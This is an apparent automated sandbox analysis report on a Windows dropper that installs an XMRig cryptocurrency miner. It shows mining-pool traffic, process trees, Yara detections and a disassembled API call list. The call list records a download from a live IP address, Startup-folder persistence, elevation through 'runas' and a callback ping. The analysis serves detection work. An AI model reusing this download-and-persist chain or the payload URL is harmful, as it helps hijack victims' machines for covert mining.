2025-01-08 10:41:58 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 35 61 63 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 30 65 65 61 64 63 34 30 62 38 62 63 36 61 36 36 64 32 63 64 38 33 34 64 35 36 34 62 32 32 35 66 35 31 61 35 66 61 30 63 33 66 39 39 38 33 64 33 62 64 34 34 62 36 30 63 65 32 37 36 34 62 61 30 32 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 7a 73 46 6e 31 78 4e 53 37 48 52 63 38 51 59 32 56 78 51 73 63 69 2f 78 4a 31 38 30 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f5acf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e000000000eeadc40b8bc6a66d2cd834d564b225f51a5fa0c3f9983d3bd44b60ce2764ba026","job_id":"zsFn1xNS7HRc8QY2VxQsci/xJ180","target":"8
2025-01-08 10:42:08 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 30 61 64 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 30 64 39 30 37 32 33 65 30 34 36 66 30 39 64 65 63 65 38 64 37 64 36 64 37 39 31 30 62 35 38 32 37 33 37 38 66 39 30 32 61 65 30 33 32 39 38 39 31 35 32 65 37 38 38 61 36 31 66 30 39 62 63 34 32 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 37 37 4b 75 6f 68 73 33 48 73 6f 62 53 4b 63 34 44 50 2b 2f 36 4e 4a 36 53 55 4d 49 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101080adf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e000000000d90723e046f09dece8d7d6d7910b5827378f902ae032989152e788a61f09bc42f","job_id":"77Kuohs3HsobSKc4DP+/6NJ6SUMI","target":"8
2025-01-08 10:42:18 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 61 61 64 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 65 65 62 34 64 31 38 30 36 35 66 32 63 61 35 35 35 37 39 63 34 30 37 32 63 35 34 32 37 30 36 30 32 38 38 65 65 63 66 64 63 37 65 63 31 61 38 31 38 38 31 36 65 36 36 62 36 62 61 34 61 35 65 34 33 39 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 30 51 79 59 76 37 2b 48 79 64 39 33 57 4e 52 47 61 77 4d 4f 43 44 71 30 50 54 74 54 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108aadf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e00000000eeb4d18065f2ca55579c4072c5427060288eecfdc7ec1a818816e66b6ba4a5e439","job_id":"0QyYv7+Hyd93WNRGawMOCDq0PTtT","target":"8
2025-01-08 10:42:28 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 34 61 64 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 32 38 64 64 66 39 31 35 64 35 66 61 31 33 64 64 31 65 30 38 61 66 63 31 39 61 37 38 34 33 39 64 34 62 65 63 33 33 30 32 39 38 34 61 39 66 62 36 34 61 33 64 39 34 33 64 65 32 30 38 65 33 64 62 33 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 52 6e 52 4b 56 73 44 4d 75 49 54 6c 38 64 53 7a 44 52 67 30 33 68 49 36 6e 52 32 47 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101094adf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e0000000028ddf915d5fa13dd1e08afc19a78439d4bec3302984a9fb64a3d943de208e3db3f","job_id":"RnRKVsDMuITl8dSzDRg03hI6nR2G","target":"8
2025-01-08 10:42:40 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 66 61 64 66 39 62 62 30 36 65 31 33 36 39 35 63 39 33 36 35 65 64 62 63 36 64 37 30 35 30 31 65 39 38 61 37 32 36 62 34 35 31 35 31 37 37 32 38 34 30 66 32 61 65 62 30 61 30 39 36 34 63 37 65 39 32 36 30 32 63 30 38 65 30 30 30 30 30 30 30 30 62 37 39 37 66 62 30 35 64 34 31 38 39 30 66 64 63 66 35 66 35 34 66 34 63 62 33 62 36 38 66 38 39 65 61 63 32 64 62 32 64 61 36 32 37 37 38 31 66 34 62 30 66 39 34 62 35 63 63 62 35 31 65 63 34 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 55 54 79 75 70 31 64 53 30 72 68 6a 4d 4f 38 51 78 65 56 47 71 46 32 52 7a 65 4e 6c 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109fadf9bb06e13695c9365edbc6d70501e98a726b45151772840f2aeb0a0964c7e92602c08e00000000b797fb05d41890fdcf5f54f4cb3b68f89eac2db2da627781f4b0f94b5ccb51ec45","job_id":"UTyup1dS0rhjMO8QxeVGqF2RzeNl","target":"8

Target ID:	0
Start time:	05:40:54
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\174.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\174.exe"
Imagebase:	0x400000
File size:	607 bytes
MD5 hash:	594579E1DF54A1B06FFABC55FEA0B376
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:40:58
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe"
Imagebase:	0x940000
File size:	13'312 bytes
MD5 hash:	AE96B1FB65498CDF458A52BC197466A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000002.1798535542.000000000300D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000002.1798535542.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000002.1798535542.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000002.1802699525.000000001D56C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000002.1798535542.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000002.1798535542.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000001.00000002.1798535542.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:40:58
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:40:58
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:40:58
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:40:59
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun
Imagebase:	0x740000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:41:08
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe"
Imagebase:	0x9c0000
File size:	13'312 bytes
MD5 hash:	AE96B1FB65498CDF458A52BC197466A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.1880311970.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.1880311970.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.1880311970.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:41:08
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:41:08
Start date:	08/01/2025
Path:	C:\xmrig\xmrig-6.22.2\xmrig.exe
Wow64 process (32bit):	false
Commandline:	"C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json
Imagebase:	0x7ff6023e0000
File size:	6'412'800 bytes
MD5 hash:	F6D520AE125F03056C4646C508218D16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000000.1796455258.00007FF602C90000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000002.2911452338.00000253A7F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000003.1799945020.00000253A7EF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000002.2911452338.00000253A7F5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000002.2911452338.00000253A7E99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000002.2911452338.00000253A7E6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	05:41:08
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.2909797201.000001EEC29C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:41:14
Start date:	08/01/2025
Path:	C:\xmrig\xmrig-6.22.2\xmrig.exe
Wow64 process (32bit):	false
Commandline:	"C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json
Imagebase:	0x7ff6023e0000
File size:	6'412'800 bytes
MD5 hash:	F6D520AE125F03056C4646C508218D16
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.2912600466.0000022D4F288000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000000.1861394280.00007FF602C90000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.2912600466.0000022D4F2B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	05:41:15
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2913382255.0000018E6124A000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	98.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	100%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0042006A Relevance: 36.8, APIs: 14, Strings: 7, Instructions: 99
filenetworkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/5.0,00000000,00000000,00000000,00000000), ref: 0042008B
InternetOpenUrlA.WININET(00000000,http://23.27.51.244/chrtrome22.exe,00000000,00000000,84083000,00000000), ref: 004200A9
SHGetFolderPathA.SHELL32(00000000,00000007,00000000,00000000,?), ref: 004200C5
lstrcat.KERNEL32(?,0042019C), ref: 004200F2
lstrcat.KERNEL32(00000000), ref: 004200F5
CreateFileA.KERNELBASE(00000000), ref: 004200F8
InternetReadFile.WININET(00000000,?,00000800,00000000), ref: 00420113
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 0042012A
CloseHandle.KERNELBASE(00000000), ref: 0042013F
CloseHandle.KERNELBASE(00000000), ref: 00420142
CloseHandle.KERNELBASE(00000000), ref: 00420145
ShellExecuteA.SHELL32(00000000,runas,?,00000000,00000000,00000000), ref: 0042015F
ShellExecuteA.SHELL32(00000000,00000000,cmd.exe,/c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun,00000000,00000000), ref: 0042016F
exit.MSVCRT ref: 00420172

Strings

msvcrt, xrefs: 00420000, 0042005C, 00420075
chrtrome22.exe, xrefs: 004200E7
Mozilla/5.0, xrefs: 00420083
runas, xrefs: 00420159
/c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun, xrefs: 00420163
http://23.27.51.244/chrtrome22.exe, xrefs: 004200A3
cmd.exe, xrefs: 00420168

Memory Dump Source

Source File: 00000000.00000002.1699645811.0000000000420000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699626677.0000000000400000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_174.jbxd

Similarity

API ID: CloseFileHandleInternet$ExecuteOpenShelllstrcat$CreateFolderPathReadWriteexit
String ID: /c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun$Mozilla/5.0$chrtrome22.exe$cmd.exe$http://23.27.51.244/chrtrome22.exe$msvcrt$runas
API String ID: 75222691-260907457
Opcode ID: 5828dc97242a5f1cfd71d24d64296864962995790c87d7feff944b9d335ea912
Instruction ID: 4d0c8195b09d4184273f967b1b4736961fd9be075b5b16e902936327ec735936
Opcode Fuzzy Hash: 5828dc97242a5f1cfd71d24d64296864962995790c87d7feff944b9d335ea912
Instruction Fuzzy Hash: E0218074A4123CBEE73097A19C89FBB7EACDF05794F900062B504A2152C7B95D51CAF8

Function 00420000 Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 123
stringnetworklibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(msvcrt), ref: 0042005D
InternetOpenA.WININET(Mozilla/5.0,00000000,00000000,00000000,00000000), ref: 0042008B
InternetOpenUrlA.WININET(00000000,http://23.27.51.244/chrtrome22.exe,00000000,00000000,84083000,00000000), ref: 004200A9
SHGetFolderPathA.SHELL32(00000000,00000007,00000000,00000000,?), ref: 004200C5
lstrcat.KERNEL32(?,0042019C), ref: 004200F2
lstrcat.KERNEL32(00000000), ref: 004200F5
CreateFileA.KERNELBASE(00000000), ref: 004200F8
CloseHandle.KERNELBASE(00000000), ref: 0042013F
CloseHandle.KERNELBASE(00000000), ref: 00420142
CloseHandle.KERNELBASE(00000000), ref: 00420145
ShellExecuteA.SHELL32(00000000,runas,?,00000000,00000000,00000000), ref: 0042015F
ShellExecuteA.SHELL32(00000000,00000000,cmd.exe,/c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun,00000000,00000000), ref: 0042016F
exit.MSVCRT ref: 00420172

Strings

msvcrt, xrefs: 00420000, 0042005C, 00420075
chrtrome22.exe, xrefs: 004200E7
Mozilla/5.0, xrefs: 00420083
runas, xrefs: 00420159
/c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun, xrefs: 00420163
http://23.27.51.244/chrtrome22.exe, xrefs: 004200A3
cmd.exe, xrefs: 00420168

Memory Dump Source

Source File: 00000000.00000002.1699645811.0000000000420000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699626677.0000000000400000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_174.jbxd

Similarity

API ID: CloseHandle$ExecuteInternetOpenShelllstrcat$CreateFileFolderLibraryLoadPathexit
String ID: /c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun$Mozilla/5.0$chrtrome22.exe$cmd.exe$http://23.27.51.244/chrtrome22.exe$msvcrt$runas
API String ID: 4046907231-260907457
Opcode ID: 6c230126ad5efff7c38b9db2869cec57cfd828519715502f81658437aa0750a8
Instruction ID: 02ad5f7071b56311adc74245f4ea32e8e34229b73a395da679d5ded148f519b2
Opcode Fuzzy Hash: 6c230126ad5efff7c38b9db2869cec57cfd828519715502f81658437aa0750a8
Instruction Fuzzy Hash: CB318E70701228BFD7209F25EC89F677FECEF05754F9140A6B80497263CA79AC11CAA8

Analysis Process: chrtrome22.exePID: 5808, Parent PID: 6744COMMON

Executed Functions

Function 00007FFD9B8B7490 Relevance: 1.6, Strings: 1, Instructions: 358COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9B8B75AD

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8955cb49ff540fc12d917c54e3f380d7ba7519d819adb1f296a0d0b1f5ae4608
Instruction ID: 0137873e42f48738d68e3008ad38a9ed38cf4f182dc24174ec138675fc70ed3e
Opcode Fuzzy Hash: 8955cb49ff540fc12d917c54e3f380d7ba7519d819adb1f296a0d0b1f5ae4608
Instruction Fuzzy Hash: 16A14931B0DA5D0FD764EB7C9825AB57BD1EF99310F1501BBE09DC72A2C918ED428781

Function 00007FFD9B8B07F2 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

<L_^, xrefs: 00007FFD9B8B0801

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID: <L_^
API String ID: 0-1405735369
Opcode ID: e5d794b3e9cca122e457d8804a36721ff170349c6d25a6b4e1a731d63ab10944
Instruction ID: 0d025995ca231dd1cfa2f78985ce7416b054445cb3932d21fd36804658a7d7ae
Opcode Fuzzy Hash: e5d794b3e9cca122e457d8804a36721ff170349c6d25a6b4e1a731d63ab10944
Instruction Fuzzy Hash: E1A1F531B1DA6D8FE755EB7CC865AA977E1EF89304F01007AD059C72E7DE24A802CB81

Function 00007FFD9B8B6678 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee3020610c855a95083ae40992a283c16c0260f6b7da62a6590afdbac8d20f38
Instruction ID: e563e18db5159e4c76a43ed6625a85f2f0f7380c281295fadf349ed7e064b1f6
Opcode Fuzzy Hash: ee3020610c855a95083ae40992a283c16c0260f6b7da62a6590afdbac8d20f38
Instruction Fuzzy Hash: 5B222B3460895D8FDB98EF6CC898AA977E1FF6C301B0501A9E85ED72A5DA35EC41CF40

Function 00007FFD9B8BB2B9 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb2beac7ba01611a07e87fd818e8d74e86c2cabdebd798d37e7e667e94a24f0
Instruction ID: d579cc365227a2ecabf3866ed75f7d17e81ac2627ed9078d678c1013ba0952fd
Opcode Fuzzy Hash: 5fb2beac7ba01611a07e87fd818e8d74e86c2cabdebd798d37e7e667e94a24f0
Instruction Fuzzy Hash: FC015B6280F7D50FD7535778887A5447FB4AE1722174E44EBC485CF1A3D51C584ACB62

Function 00007FFD9B8BADF2 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b6064b34bd32f5242973334f5f310184074b9ead1f15e056963170a1786589
Instruction ID: a2b4ad2dfa018931a5c268f903ccfab9dc015bc7bdc2563529a21f3cfa230dee
Opcode Fuzzy Hash: 91b6064b34bd32f5242973334f5f310184074b9ead1f15e056963170a1786589
Instruction Fuzzy Hash: 8251A463A0F6E95FE76287789C795E53FA0EF1A61070E01F7C4E48B0E3DD18690A8791

Function 00007FFD9B8B7CD0 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ede2fd8190a15195c3ff45f17d2dd65790b714d6feee9c1a442fad4962b0058
Instruction ID: 64df94e8607ab20a19153aa2c183d034558169aecc47e960839e39bee2f4529f
Opcode Fuzzy Hash: 5ede2fd8190a15195c3ff45f17d2dd65790b714d6feee9c1a442fad4962b0058
Instruction Fuzzy Hash: 7BB12C21F0EB5E0FEBA5977C487567967D1EF98344F0901B9D04EC32E7DD18A9018781

Function 00007FFD9B8B7A30 Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

